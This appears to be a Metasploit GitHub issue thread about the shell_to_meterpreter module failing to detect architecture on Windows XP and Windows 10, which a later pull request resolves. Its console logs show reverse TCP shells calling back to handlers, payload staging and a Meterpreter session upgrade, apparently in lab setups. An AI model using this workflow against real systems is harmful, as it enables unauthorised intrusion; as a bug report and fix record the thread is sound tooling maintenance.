metasploit-framework
metasploit-framework copied to clipboard
rapid7
post/multi/manage/shell_to_meterpreter: Target is running Windows on an unsupported architecture such as Windows ARM!
post/multi/manage/shell_to_meterpreter fails on Windows XP SP3 x86 over a windows/shell/reverse_tcp session. Meterpreter supports Windows XP SP3.
Since #15864, shell_to_meterpreter attempts to use wmic os get osarchitecture which is not a valid WMIC query on XP SP3.
https://github.com/rapid7/metasploit-framework/blob/f043b121b32664f545c9d96ca43bb7fe84f6385a/modules/post/multi/manage/shell_to_meterpreter.rb#L84-L100
msf6> use exploit/multi/handler
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set lport 1338
lport => 1338
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.200.130:1338
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.216
[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.216:1093) at 2022-07-19 03:50:31 -0400
Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----
C:\Documents and Settings\user\Desktop>systeminfo
systeminfo
Host Name: EXPEE
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
[...]
C:\Documents and Settings\user\Desktop>^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/windows Shell Banner: Microsoft Windows XP [Version 5.1.2600] ----- 192.168.200.130:1338 -> 192.168.200.216:1093 (192.168.200.216)
Looking here https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb
At line 88, not sure if the syntax is correct.
Cross-referencing: https://github.com/rapid7/metasploit-framework/pull/17336 - potentially better OS architecture detection would be a good follow on from the OS version detection API PR
same.
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 shell x64/windows Shell Banner: Microsoft Windows [_ 10.0.19 192.168.1.1:7777 -> 192.168.1.1:33333
045.2965] (c) Microsoft Corporatio... (192.168.1.1)
Also occurred on windows10 1903.
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 shell x64/windows Shell Banner: Microsof 10.65.106.99:4444 -> 10
t Windows [_ 10.0.1836 .65.106.99:47773 (172.1
2.30] ----- 6.1.139)
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
Vulnerable target env is windows 10 1903(CVE-2020-0796)
msf6 post(multi/manage/shell_to_meterpreter) > sessions 5
[*] Starting interaction with 5...
Shell Banner:
Microsoft Windows [_ 10.0.18362.30]
-----
C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo
������: DESKTOP-O0U77NO
OS ����: Microsoft Windows 10 רҵ��
OS �汾: 10.0.18362 ��ȱ Build 18362
OS ������: Microsoft Corporation
OS ����: ��������վ
OS ��������: Multiprocessor Free
Looks like this issue can be closed now, it was resolved by https://github.com/rapid7/metasploit-framework/pull/18062 which no longer uses wmic and currently detects the target architecture:
Target:
msf6 payload(windows/shell/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...
Shell Banner:
'\\vmware-host\Shared Folders\Desktop'
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
-----
C:\WINDOWS>systeminfo
systeminfo
Host Name: ZACH-F90A9C7F47
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Module working:
msf6 payload(windows/shell/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.1:4433
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
.... etc etc....
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Sending stage (175686 bytes) to 192.168.2.135
[*] Command stager progress: 100.00% (102108/102108 bytes)
msf6 payload(windows/shell/reverse_tcp) >
[*] Meterpreter session 3 opened (192.168.2.1:4433 -> 192.168.2.135:1163) at 2023-10-23 10:32:18 -0500
Works as expected with the ENV detection:
